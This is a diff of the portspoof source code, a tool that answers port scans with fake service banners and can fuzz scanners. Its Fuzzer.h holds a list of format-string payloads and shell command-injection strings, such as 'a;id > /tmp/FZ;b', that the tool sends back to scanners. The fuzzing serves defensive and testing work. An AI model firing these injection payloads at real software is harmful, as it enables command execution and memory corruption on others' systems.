/usr/include/stdio.h /usr/include/secure/_stdio.h \
|
||||
/usr/include/secure/_common.h revregex.h /usr/include/string.h \
|
||||
/usr/include/strings.h /usr/include/secure/_string.h \
|
||||
/usr/include/stdlib.h /usr/include/sys/wait.h \
|
||||
/usr/include/sys/resource.h /usr/include/alloca.h /usr/include/ctype.h \
|
||||
/usr/include/runetype.h threads.h porspoof.h
|
||||
|
||||
connection.h:
|
||||
|
||||
/usr/include/sys/socket.h:
|
||||
|
||||
/usr/include/sys/types.h:
|
||||
|
||||
/usr/include/sys/appleapiopts.h:
|
||||
|
||||
/usr/include/sys/cdefs.h:
|
||||
|
||||
/usr/include/sys/_symbol_aliasing.h:
|
||||
|
||||
/usr/include/sys/_posix_availability.h:
|
||||
|
||||
/usr/include/machine/types.h:
|
||||
|
||||
/usr/include/i386/types.h:
|
||||
|
||||
/usr/include/i386/_types.h:
|
||||
|
||||
/usr/include/sys/_types.h:
|
||||
|
||||
/usr/include/machine/_types.h:
|
||||
|
||||
/usr/include/machine/endian.h:
|
||||
|
||||
/usr/include/i386/endian.h:
|
||||
|
||||
/usr/include/sys/_endian.h:
|
||||
|
||||
/usr/include/libkern/_OSByteOrder.h:
|
||||
|
||||
/usr/include/libkern/i386/_OSByteOrder.h:
|
||||
|
||||
/usr/include/sys/_structs.h:
|
||||
|
||||
/usr/include/machine/_param.h:
|
||||
|
||||
/usr/include/i386/_param.h:
|
||||
|
||||
/usr/include/Availability.h:
|
||||
|
||||
/usr/include/AvailabilityInternal.h:
|
||||
|
||||
/usr/include/assert.h:
|
||||
|
||||
/usr/include/net/if.h:
|
||||
|
||||
/usr/include/net/if_var.h:
|
||||
|
||||
/usr/include/stdint.h:
|
||||
|
||||
/usr/include/sys/time.h:
|
||||
|
||||
/usr/include/time.h:
|
||||
|
||||
/usr/include/_types.h:
|
||||
|
||||
/usr/include/_structs.h:
|
||||
|
||||
/usr/include/sys/_select.h:
|
||||
|
||||
/usr/include/sys/queue.h:
|
||||
|
||||
/usr/include/sys/ioctl.h:
|
||||
|
||||
/usr/include/sys/ttycom.h:
|
||||
|
||||
/usr/include/sys/ioccom.h:
|
||||
|
||||
/usr/include/sys/filio.h:
|
||||
|
||||
/usr/include/sys/sockio.h:
|
||||
|
||||
/usr/include/sys/stat.h:
|
||||
|
||||
/usr/include/netinet/in.h:
|
||||
|
||||
/usr/include/netinet6/in6.h:
|
||||
|
||||
/usr/include/sys/sysctl.h:
|
||||
|
||||
/usr/include/sys/ucred.h:
|
||||
|
||||
/usr/include/sys/param.h:
|
||||
|
||||
/usr/include/sys/syslimits.h:
|
||||
|
||||
/usr/include/machine/param.h:
|
||||
|
||||
/usr/include/i386/param.h:
|
||||
|
||||
/usr/include/i386/_param.h:
|
||||
|
||||
/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/limits.h:
|
||||
|
||||
/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/syslimits.h:
|
||||
|
||||
/usr/include/limits.h:
|
||||
|
||||
/usr/include/machine/limits.h:
|
||||
|
||||
/usr/include/i386/limits.h:
|
||||
|
||||
/usr/include/i386/_limits.h:
|
||||
|
||||
/usr/include/sys/signal.h:
|
||||
|
||||
/usr/include/machine/signal.h:
|
||||
|
||||
/usr/include/i386/signal.h:
|
||||
|
||||
/usr/include/i386/_structs.h:
|
||||
|
||||
/usr/include/machine/_structs.h:
|
||||
|
||||
/usr/include/mach/i386/_structs.h:
|
||||
|
||||
/usr/include/bsm/audit.h:
|
||||
|
||||
/usr/include/mach/port.h:
|
||||
|
||||
/usr/include/mach/boolean.h:
|
||||
|
||||
/usr/include/mach/machine/boolean.h:
|
||||
|
||||
/usr/include/mach/i386/boolean.h:
|
||||
|
||||
/usr/include/mach/machine/vm_types.h:
|
||||
|
||||
/usr/include/mach/i386/vm_types.h:
|
||||
|
||||
/usr/include/mach/i386/vm_param.h:
|
||||
|
||||
/usr/include/sys/proc.h:
|
||||
|
||||
/usr/include/sys/select.h:
|
||||
|
||||
/usr/include/sys/lock.h:
|
||||
|
||||
/usr/include/sys/event.h:
|
||||
|
||||
/usr/include/sys/vm.h:
|
||||
|
||||
/usr/include/netdb.h:
|
||||
|
||||
/usr/include/fcntl.h:
|
||||
|
||||
/usr/include/sys/fcntl.h:
|
||||
|
||||
/usr/include/err.h:
|
||||
|
||||
/usr/include/errno.h:
|
||||
|
||||
/usr/include/sys/errno.h:
|
||||
|
||||
/usr/include/stdio.h:
|
||||
|
||||
/usr/include/secure/_stdio.h:
|
||||
|
||||
/usr/include/secure/_common.h:
|
||||
|
||||
revregex.h:
|
||||
|
||||
/usr/include/string.h:
|
||||
|
||||
/usr/include/strings.h:
|
||||
|
||||
/usr/include/secure/_string.h:
|
||||
|
||||
/usr/include/stdlib.h:
|
||||
|
||||
/usr/include/sys/wait.h:
|
||||
|
||||
/usr/include/sys/resource.h:
|
||||
|
||||
/usr/include/alloca.h:
|
||||
|
||||
/usr/include/ctype.h:
|
||||
|
||||
/usr/include/runetype.h:
|
||||
|
||||
threads.h:
|
||||
|
||||
porspoof.h:
|
1
src/src/.deps/portspoof-connection.Po
Normal file
1
src/src/.deps/portspoof-connection.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
1
src/src/.deps/portspoof-portspoof.Po
Normal file
1
src/src/.deps/portspoof-portspoof.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
1
src/src/.deps/portspoof-revregex.Po
Normal file
1
src/src/.deps/portspoof-revregex.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
1
src/src/.deps/portspoof.Po
Normal file
1
src/src/.deps/portspoof.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
1
src/src/.deps/revregex.Po
Normal file
1
src/src/.deps/revregex.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
282
src/src/Configuration.cpp
Normal file
282
src/src/Configuration.cpp
Normal file
@ -0,0 +1,282 @@
|
||||
#include "Configuration.h"
|
||||
|
||||
Configuration::Configuration()
|
||||
{
|
||||
configfile = std::string(CONF_FILE);
|
||||
signaturefile = std::string(SIGNATURE_FILE);
|
||||
logfile = std::string(LOG_FILE);
|
||||
bind_ip=std::string();
|
||||
port=DEFAULT_PORT;
|
||||
opts=0;
|
||||
nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);
|
||||
fuzzpayload_file = std::string(FUZZ_FILE_PAYLOAD);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
bool Configuration::getConfigValue(int value)
|
||||
{
|
||||
return this->opts[value];
|
||||
}
|
||||
|
||||
void Configuration::usage(void)
|
||||
{
|
||||
fprintf(stdout,"Usage: portspoof [OPTION]...\n"
|
||||
"Portspoof - service signature obfuscator.\n\n"
|
||||
"-i bind to a user defined IP address\n"
|
||||
"-p bind to a user defined PORT number\n"
|
||||
"-s custom signture file\n"
|
||||
"-c configuration file\n"
|
||||
"-l log port scanning alerts to a file\n"
|
||||
"-d disable syslog\n"
|
||||
"-v be verbose\n"
|
||||
"-f read fuzz payload list\n"
|
||||
"-1 generate fuzzing payloads\n"
|
||||
"-n nmap wrap fuzz signatures\n"
|
||||
"-h display this help and exit\n\n"
|
||||
"Without any OPTION - use default values and continue\n");
|
||||
|
||||
exit(1);
|
||||
}
|
||||
|
||||
bool Configuration::processArgs(int argc, char** argv)
|
||||
{
|
||||
int ch;
|
||||
extern char *__progname;
|
||||
|
||||
while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
|
||||
switch (ch) {
|
||||
case 'i':
|
||||
this->bind_ip = std::string(optarg);
|
||||
this->opts[OPT_IP]=1;
|
||||
break;
|
||||
case 'p':
|
||||
this->port = atoi(optarg);
|
||||
this->opts[OPT_PORT]=1;
|
||||
break;
|
||||
case 's':
|
||||
this->signaturefile = std::string(optarg);
|
||||
this->opts[OPT_SIG_FILE]=1;
|
||||
|
||||
break;
|
||||
case 'c':
|
||||
this->configfile = std::string(optarg);
|
||||
this->opts[OPT_CONFIG_FILE]=1;
|
||||
|
||||
break;
|
||||
case 'v':
|
||||
this->opts[OPT_DEBUG]=1;
|
||||
fprintf(stdout,"-> Verbose mode on.\n");
|
||||
break;
|
||||
case 'd':
|
||||
this->opts[OPT_SYSLOG_DIS]=1;
|
||||
fprintf(stdout,"-> Syslog logging disabled.\n");
|
||||
break;
|
||||
case 'l':
|
||||
this->opts[OPT_LOG_FILE]=1;
|
||||
this->logfile = std::string(optarg);
|
||||
fprintf(stdout,"-> Using log file %s\n",this->logfile.c_str());
|
||||
break;
|
||||
case 'f':
|
||||
this->opts[OPT_FUZZ_WORDLIST]=1;
|
||||
this->fuzzpayload_file=std::string(optarg);
|
||||
fprintf(stdout,"-> Reading fuzzing payloads from a file!\n");
|
||||
break;
|
||||
case 'n':
|
||||
this->opts[OPT_FUZZ_NMAP]=1;
|
||||
this->nmapfuzzsignatures_file=std::string(optarg);
|
||||
fprintf(stdout,"-> NMAP wrapper mode!\n");
|
||||
break;
|
||||
case '1':
|
||||
this->opts[OPT_FUZZ_INTERNAL]=1;
|
||||
fprintf(stdout,"-> Generate fuzzing payloads!\n");
|
||||
break;
|
||||
case '2':
|
||||
this->opts[OPT_NOT_NMAP_SCANNER]=1;
|
||||
fprintf(stdout,"-> Switching to simple reply mode (anything apart from Nmap)!\n");
|
||||
break;
|
||||
case '3':
|
||||
this->opts[OPT_FUZZ_RANDOM]=1;
|
||||
fprintf(stdout,"-> Random int fuzzing!\n");
|
||||
break;
|
||||
case 'h':
|
||||
this->usage();
|
||||
break;
|
||||
default:
|
||||
fprintf(stdout,"Try ` %s -h' for more information.\n\n", __progname);
|
||||
exit(0);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if(this->opts==0)
|
||||
{
|
||||
fprintf(stdout,"-> No parameters - using default values.\n");
|
||||
}
|
||||
|
||||
if(this->getConfigValue(OPT_FUZZ_NMAP) ||this->getConfigValue(OPT_FUZZ_WORDLIST) || this->getConfigValue(OPT_FUZZ_INTERNAL))
|
||||
this->fuzzer=new Fuzzer(this);
|
||||
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
std::string Configuration::getConfigFile()
|
||||
{
|
||||
return this->configfile;
|
||||
}
|
||||
std::string Configuration::getSignatureFile()
|
||||
{
|
||||
return this->signaturefile;
|
||||
|
||||
}
|
||||
std::string Configuration::getNmapfuzzSignaturesFile()
|
||||
{
|
||||
return this->nmapfuzzsignatures_file;
|
||||
}
|
||||
std::string Configuration::getFuzzPayloadFile()
|
||||
{
|
||||
return this->fuzzpayload_file;
|
||||
|
||||
}
|
||||
std::string Configuration::getLogFile()
|
||||
{
|
||||
return this->logfile;
|
||||
}
|
||||
|
||||
std::string Configuration::getBindIP()
|
||||
{
|
||||
return this->bind_ip;
|
||||
}
|
||||
|
||||
unsigned short int Configuration::getPort()
|
||||
{
|
||||
return this->port;
|
||||
}
|
||||
|
||||
std::vector<char> Configuration::mapPort2Signature(unsigned short port)
|
||||
{
|
||||
/*
|
||||
if(this->opts&OPT_FUZZ_WORDLIST
|
||||
{
|
||||
|
||||
std::string input_line;
|
||||
std::getline(std::cin, input_line);
|
||||
std::vector<char> result_vector;
|
||||
|
||||
for(int i=0; i<input_line.length();i++)
|
||||
result_vector.push_back(input_line[i]);
|
||||
return result_vector;
|
||||
|
||||
}
|
||||
*/
|
||||
if(this->opts[OPT_FUZZ_NMAP] || this->opts[OPT_FUZZ_INTERNAL] || this->opts[OPT_FUZZ_WORDLIST])
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
result_vector=this->fuzzer->GetFUZZ();
|
||||
return result_vector;
|
||||
}
|
||||
else
|
||||
return this->portsignatureemap[port];
|
||||
}
|
||||
|
||||
bool Configuration::processSignatureFile()
|
||||
{
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
|
||||
FILE *fp = fopen(this->signaturefile.c_str(), "r");
|
||||
if (fp == NULL) {
|
||||
fprintf(stdout,"Error opening signature file: %s \n",this->signaturefile.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
while (fgets(buf_file, BUFSIZE, fp))
|
||||
rawsignatures.push_back(std::string(buf_file));
|
||||
|
||||
fclose(fp);
|
||||
|
||||
// set random mapping
|
||||
//srand((unsigned)time(0));
|
||||
for(int i=0;i<MAX_PORTS;i++)
|
||||
{
|
||||
//portsignatureemap.insert(make_pair(i,process_signature(rawsignatures[rand()%rawsignatures.size()])));
|
||||
portsignatureemap.insert(make_pair(i,process_signature(rawsignatures[i%rawsignatures.size()])));
|
||||
|
||||
}
|
||||
|
||||
|
||||
return 0;
|
||||
|
||||
}
|
||||
|
||||
bool Configuration::readConfigFile()
|
||||
{
|
||||
char tmp[BUFSIZE], str1[BUFSIZE], str2[BUFSIZE];
|
||||
int lp,hp;
|
||||
std::stringstream ss;
|
||||
|
||||
|
||||
FILE *fp = fopen(this->configfile.c_str(), "r");
|
||||
if (fp == NULL) {
|
||||
fprintf(stdout,"Error opening file: %s \n",this->configfile.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
while (fgets(tmp, BUFSIZE, fp))
|
||||
if (strlen(tmp) >1 && tmp[0]!='#')
|
||||
{
|
||||
|
||||
if(sscanf(tmp, "%s %s",str1,str2)==EOF){
|
||||
fprintf(stdout,"Error in configuration file");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if(str1==NULL || str2==NULL)
|
||||
{
|
||||
fprintf(stdout,"Error in configuration file");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if(Utils::isNumeric(str1)) //single port
|
||||
{
|
||||
sscanf(str1,"%d",&lp);
|
||||
//DEBUG
|
||||
//fprintf(stdout,"port %d value: %s\n",lp,Utils::get_substring_value(tmp));
|
||||
|
||||
portsignatureemap[lp]=process_signature(std::string(Utils::get_substring_value(tmp)));
|
||||
continue;
|
||||
}
|
||||
else
|
||||
{
|
||||
if(sscanf(str1, "%d-%d",&lp,&hp)==EOF){
|
||||
fprintf(stdout,"Error in configuration file\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if(lp==0 || hp==0)
|
||||
{
|
||||
fprintf(stdout,"Error in configuration file");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
//DEBUG
|
||||
//fprintf(stdout,"range port %d-%d value: %s\n",lp,hp,Utils::get_substring_value(tmp));
|
||||
|
||||
for(int i=lp;i<=hp;i++)
|
||||
portsignatureemap[i]=process_signature(std::string(Utils::get_substring_value(tmp)));
|
||||
|
||||
continue;
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
fclose(fp);
|
||||
|
||||
|
||||
return 0;
|
||||
|
||||
}
|
||||
|
94
src/src/Configuration.h
Normal file
94
src/src/Configuration.h
Normal file
@ -0,0 +1,94 @@
|
||||
#ifndef CONFIG_H
|
||||
#define CONFIG_H
|
||||
|
||||
#define CONFSEPARATOR "/"
|
||||
#define DEFAULT_PORT 4444
|
||||
#define BUFSIZE 1024
|
||||
|
||||
#define LOG_FILE "portspoof.log"
|
||||
#define CONF_FILE "portspoof.conf"
|
||||
#define SIGNATURE_FILE "signatures"
|
||||
#define OPT_FUZZ_WORDLIST 1
|
||||
#define OPT_IP 2
|
||||
#define OPT_PORT 3
|
||||
#define OPT_DEBUG 4
|
||||
#define OPT_SIG_FILE 5
|
||||
#define OPT_LOG_FILE 6
|
||||
#define OPT_SYSLOG_DIS 7
|
||||
#define OPT_CONFIG_FILE 8
|
||||
#define OPT_FUZZ_NMAP 9
|
||||
#define OPT_FUZZ_INTERNAL 10
|
||||
#define OPT_NOT_NMAP_SCANNER 11
|
||||
#define OPT_FUZZ_RANDOM 12
|
||||
|
||||
#define MAX_PORTS 65535
|
||||
|
||||
#define NMAP_FUZZ_FILE_SIG "nmapfuzzsignatures"
|
||||
#define FUZZ_FILE_PAYLOAD "nmapfuzzpayloads"
|
||||
|
||||
#include <string>
|
||||
#include <stdio.h>
|
||||
#include <ctype.h>
|
||||
#include <pcap.h>
|
||||
#include <map>
|
||||
#include <vector>
|
||||
#include <sstream>
|
||||
#include <unistd.h>
|
||||
#include <algorithm>
|
||||
#include <iostream>
|
||||
#include <ctime>
|
||||
#include <bitset>
|
||||
|
||||
#include "revregex.h"
|
||||
#include "connection.h"
|
||||
|
||||
#include "Utils.h"
|
||||
|
||||
using namespace std;
|
||||
|
||||
|
||||
typedef map < unsigned short, std::vector<char> > Port_Signature_Map;
|
||||
typedef vector < string > Raw_Signatures_Vector;
|
||||
typedef vector < string > Nmap_Fuzz_Vector;
|
||||
class Fuzzer;
|
||||
|
||||
#include "Fuzzer.h"
|
||||
|
||||
|
||||
class Configuration {
|
||||
private:
|
||||
std::string configfile;
|
||||
std::string signaturefile;
|
||||
std::string logfile;
|
||||
std::string bind_ip;
|
||||
unsigned short int port;
|
||||
bitset<20> opts;
|
||||
Fuzzer* fuzzer;
|
||||
std::string nmapfuzzsignatures_file;
|
||||
std::string fuzzpayload_file;
|
||||
Port_Signature_Map portsignatureemap;
|
||||
Raw_Signatures_Vector rawsignatures;
|
||||
|
||||
|
||||
public:
|
||||
Configuration();
|
||||
void usage(void);
|
||||
bool processArgs(int argc, char** argv);
|
||||
bool readConfigFile();
|
||||
std::vector<char> mapPort2Signature(unsigned short port);
|
||||
bool processSignatureFile();
|
||||
|
||||
//getters
|
||||
std::string getConfigFile();
|
||||
std::string getSignatureFile();
|
||||
std::string getLogFile();
|
||||
std::string getBindIP();
|
||||
std::string getNmapfuzzSignaturesFile();
|
||||
std::string getFuzzPayloadFile();
|
||||
bool getConfigValue(int value);
|
||||
unsigned short int getPort();
|
||||
|
||||
};
|
||||
|
||||
|
||||
#endif
|
182
src/src/Fuzzer.cpp
Normal file
182
src/src/Fuzzer.cpp
Normal file
@ -0,0 +1,182 @@
|
||||
#include "Fuzzer.h"
|
||||
|
||||
Fuzzer::Fuzzer()
|
||||
{
|
||||
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
Fuzzer::Fuzzer(Configuration* configuration)
|
||||
{
|
||||
|
||||
this->configuration = configuration;
|
||||
this->nmapfuzzsignatures_file = configuration->getNmapfuzzSignaturesFile();
|
||||
this->fuzzpayload_file = configuration->getFuzzPayloadFile();
|
||||
this->counter=0;
|
||||
this->payload_counter=0;
|
||||
this->PrepareFuzzer();
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
bool Fuzzer::PrepareFuzzer()
|
||||
{
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
|
||||
{
|
||||
|
||||
this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
|
||||
if ( this->fp_payloads == NULL) {
|
||||
fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
}
|
||||
/////
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
|
||||
{
|
||||
|
||||
FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
|
||||
if (fp == NULL) {
|
||||
fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
while (fgets(buf_file, BUFSIZE, fp))
|
||||
nmapfuzzsignatures.push_back(std::string(buf_file));
|
||||
fclose(fp);
|
||||
fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
|
||||
|
||||
}
|
||||
|
||||
return 0;
|
||||
|
||||
}
|
||||
|
||||
std::vector<char> Fuzzer::intToBytes(int paramInt)
|
||||
{
|
||||
vector<char> arrayOfByte(4);
|
||||
for (int i = 0; i < 4; i++)
|
||||
arrayOfByte[3 - i] = (paramInt >> (i * 8));
|
||||
return arrayOfByte;
|
||||
}
|
||||
|
||||
|
||||
std::vector<char> Fuzzer::shortToBytes(unsigned short paramInt)
|
||||
{
|
||||
vector<char> arrayOfByte(2);
|
||||
for (int i = 0; i < 2; i++)
|
||||
arrayOfByte[1 - i] = (paramInt >> (i * 4));
|
||||
return arrayOfByte;
|
||||
}
|
||||
|
||||
std::vector<char> Fuzzer::GenerateFuzzPayload()
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
std::string str;
|
||||
|
||||
/*
|
||||
for(int i=0;i<255;i++)
|
||||
result_vector.push_back(i);
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_RANDOM))
|
||||
{
|
||||
this->payload_counter++;
|
||||
return this->shortToBytes((unsigned short)this->payload_counter);
|
||||
|
||||
}
|
||||
*/
|
||||
|
||||
if(this->payload_counter<10)
|
||||
{
|
||||
for(int i=0;i<4000*(this->payload_counter+1);i++)
|
||||
result_vector.push_back(*(fuzz_oracle[0]));
|
||||
}
|
||||
else
|
||||
{
|
||||
|
||||
str=std::string(fuzz_oracle[this->payload_counter-9]);
|
||||
result_vector=Utils::str2vector(str);
|
||||
}
|
||||
|
||||
this->payload_counter++;
|
||||
|
||||
if(this->payload_counter>=25)
|
||||
this->payload_counter=0;
|
||||
|
||||
return result_vector;
|
||||
|
||||
}
|
||||
|
||||
std::vector<char> Fuzzer::GetFUZZ()
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
|
||||
{
|
||||
|
||||
|
||||
if(this->counter%this->nmapfuzzsignatures.size()==0)
|
||||
{
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
std::string str;
|
||||
|
||||
if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
|
||||
{
|
||||
fprintf(stdout,"EOF of payload file\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
str=std::string(buf_file);
|
||||
str.erase(str.size() - 1);//remove \n
|
||||
this->input_line=Utils::str2vector(str);
|
||||
|
||||
}
|
||||
|
||||
this->counter++;
|
||||
|
||||
}
|
||||
else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
|
||||
{
|
||||
result_vector=this->GenerateFuzzPayload();
|
||||
}
|
||||
else
|
||||
fprintf(stdout,"Fuzz - shouldn't be here...\n");
|
||||
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
|
||||
{
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
|
||||
result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
|
||||
else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
|
||||
result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],result_vector);
|
||||
|
||||
result_vector=Utils::unescape(result_vector);
|
||||
|
||||
}
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
/*
|
||||
std::string input_line;
|
||||
std::getline(std::cin, input_line);
|
||||
|
||||
|
||||
for(int i=0; i<input_line.length();i++)
|
||||
result_vector.push_back(input_line[i]);
|
||||
return result_vector;
|
||||
*/
|
75
src/src/Fuzzer.h
Normal file
75
src/src/Fuzzer.h
Normal file
@ -0,0 +1,75 @@
|
||||
#ifndef FUZZER_H
|
||||
#define FUZZER_H
|
||||
|
||||
#include <string>
|
||||
#include <stdio.h>
|
||||
#include <ctype.h>
|
||||
#include <pcap.h>
|
||||
#include <map>
|
||||
#include <vector>
|
||||
#include <sstream>
|
||||
#include <unistd.h>
|
||||
#include <algorithm>
|
||||
#include <iostream>
|
||||
#include <ctime>
|
||||
#include <pthread.h>
|
||||
#include <iostream>
|
||||
#include <string>
|
||||
#include <iostream>
|
||||
#include <fstream>
|
||||
#include <sstream>
|
||||
|
||||
#include "Utils.h"
|
||||
#include "Configuration.h"
|
||||
|
||||
using namespace std;
|
||||
|
||||
|
||||
static const char* const fuzz_oracle[]=
|
||||
{
|
||||
"A",
|
||||
"%n%n%n%n%n",
|
||||
"%%20n",
|
||||
"%n%p%s%d%x",
|
||||
"%.1024d",
|
||||
"%.2049d",
|
||||
"-1",
|
||||
"32767",
|
||||
"65535",
|
||||
"-2147483647",
|
||||
"0xffffffff",
|
||||
"a|id > /tmp/FZ|b",
|
||||
"a`id > /tmp/FZ`b",
|
||||
"a'id > /tmp/FZ'b",
|
||||
"a;id > /tmp/FZ;b",
|
||||
"a&&id > /tmp/FZ&&b"
|
||||
};
|
||||
|
||||
|
||||
class Fuzzer{
|
||||
private:
|
||||
|
||||
std::string nmapfuzzsignatures_file;
|
||||
std::string fuzzpayload_file;
|
||||
Nmap_Fuzz_Vector nmapfuzzsignatures;
|
||||
FILE *fp_payloads;
|
||||
std::vector<char> input_line;
|
||||
Configuration* configuration;
|
||||
int counter;
|
||||
int payload_counter;
|
||||
int nmapfuzzsignatures_size;
|
||||
|
||||
public:
|
||||
Fuzzer();
|
||||
Fuzzer(Configuration* configuration);
|
||||
bool processSignatureFile();
|
||||
std::vector<char> GetFUZZ();
|
||||
std::vector<char> GenerateFuzzPayload();
|
||||
std::vector<char> intToBytes(int paramInt);
|
||||
std::vector<char> shortToBytes(unsigned short paramInt);
|
||||
|
||||
bool PrepareFuzzer();
|
||||
};
|
||||
|
||||
|
||||
#endif
|
17
src/src/Makefile.am
Normal file
17
src/src/Makefile.am
Normal file
@ -0,0 +1,17 @@
|
||||
## Process this file with automake to produce Makefile.in
|
||||
|
||||
# File lists
|
||||
headers = connection.h portspoof.h revregex.h threads.h log.h config_file.h
|
||||
sources = connection.c portspoof.c revregex.c log.c config_file.c
|
||||
|
||||
# Unix executables
|
||||
bin_PROGRAMS = portspoof
|
||||
portspoof_SOURCES = $(headers) $(sources)
|
||||
|
||||
# Threads
|
||||
portspoof_LDFLAGS = @LDFLAGS@ -pthread
|
||||
|
||||
#Preprocessor detinitions
|
||||
portspoof_CPPFLAGS = -DCONFDIR='"$(sysconfdir)"'
|
||||
|
||||
|
526
src/src/Makefile.in
Normal file
526
src/src/Makefile.in
Normal file
@ -0,0 +1,526 @@
|
||||
# Makefile.in generated by automake 1.10 from Makefile.am.
|
||||
# @configure_input@
|
||||
|
||||
# Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002,
|
||||
# 2003, 2004, 2005, 2006 Free Software Foundation, Inc.
|
||||
# This Makefile.in is free software; the Free Software Foundation
|
||||
# gives unlimited permission to copy and/or distribute it,
|
||||
# with or without modifications, as long as this notice is preserved.
|
||||
|
||||
# This program is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
|
||||
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
|
||||
# PARTICULAR PURPOSE.
|
||||
|
||||
@SET_MAKE@
|
||||
|
||||
VPATH = @srcdir@
|
||||
pkgdatadir = $(datadir)/@PACKAGE@
|
||||
pkglibdir = $(libdir)/@PACKAGE@
|
||||
pkgincludedir = $(includedir)/@PACKAGE@
|
||||
am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd
|
||||
install_sh_DATA = $(install_sh) -c -m 644
|
||||
install_sh_PROGRAM = $(install_sh) -c
|
||||
install_sh_SCRIPT = $(install_sh) -c
|
||||
INSTALL_HEADER = $(INSTALL_DATA)
|
||||
transform = $(program_transform_name)
|
||||
NORMAL_INSTALL = :
|
||||
PRE_INSTALL = :
|
||||
POST_INSTALL = :
|
||||
NORMAL_UNINSTALL = :
|
||||
PRE_UNINSTALL = :
|
||||
POST_UNINSTALL = :
|
||||
build_triplet = @build@
|
||||
host_triplet = @host@
|
||||
bin_PROGRAMS = portspoof$(EXEEXT)
|
||||
subdir = src
|
||||
DIST_COMMON = $(srcdir)/Makefile.am $(srcdir)/Makefile.in \
|
||||
$(srcdir)/config.h.in
|
||||
ACLOCAL_M4 = $(top_srcdir)/aclocal.m4
|
||||
am__aclocal_m4_deps = $(top_srcdir)/configure.in
|
||||
am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \
|
||||
$(ACLOCAL_M4)
|
||||
mkinstalldirs = $(install_sh) -d
|
||||
CONFIG_HEADER = config.h
|
||||
CONFIG_CLEAN_FILES =
|
||||
am__installdirs = "$(DESTDIR)$(bindir)"
|
||||
binPROGRAMS_INSTALL = $(INSTALL_PROGRAM)
|
||||
PROGRAMS = $(bin_PROGRAMS)
|
||||
am__objects_1 =
|
||||
am__objects_2 = portspoof-connection.$(OBJEXT) \
|
||||
portspoof-portspoof.$(OBJEXT) portspoof-revregex.$(OBJEXT) \
|
||||
portspoof-log.$(OBJEXT) portspoof-config_file.$(OBJEXT)
|
||||
am_portspoof_OBJECTS = $(am__objects_1) $(am__objects_2)
|
||||
portspoof_OBJECTS = $(am_portspoof_OBJECTS)
|
||||
portspoof_LDADD = $(LDADD)
|
||||
portspoof_LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(portspoof_LDFLAGS) \
|
||||
$(LDFLAGS) -o $@
|
||||
DEFAULT_INCLUDES = -I.@am__isrc@
|
||||
depcomp = $(SHELL) $(top_srcdir)/auto/depcomp
|
||||
am__depfiles_maybe = depfiles
|
||||
COMPILE = $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) \
|
||||
$(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS)
|
||||
CCLD = $(CC)
|
||||
LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@
|
||||
SOURCES = $(portspoof_SOURCES)
|
||||
DIST_SOURCES = $(portspoof_SOURCES)
|
||||
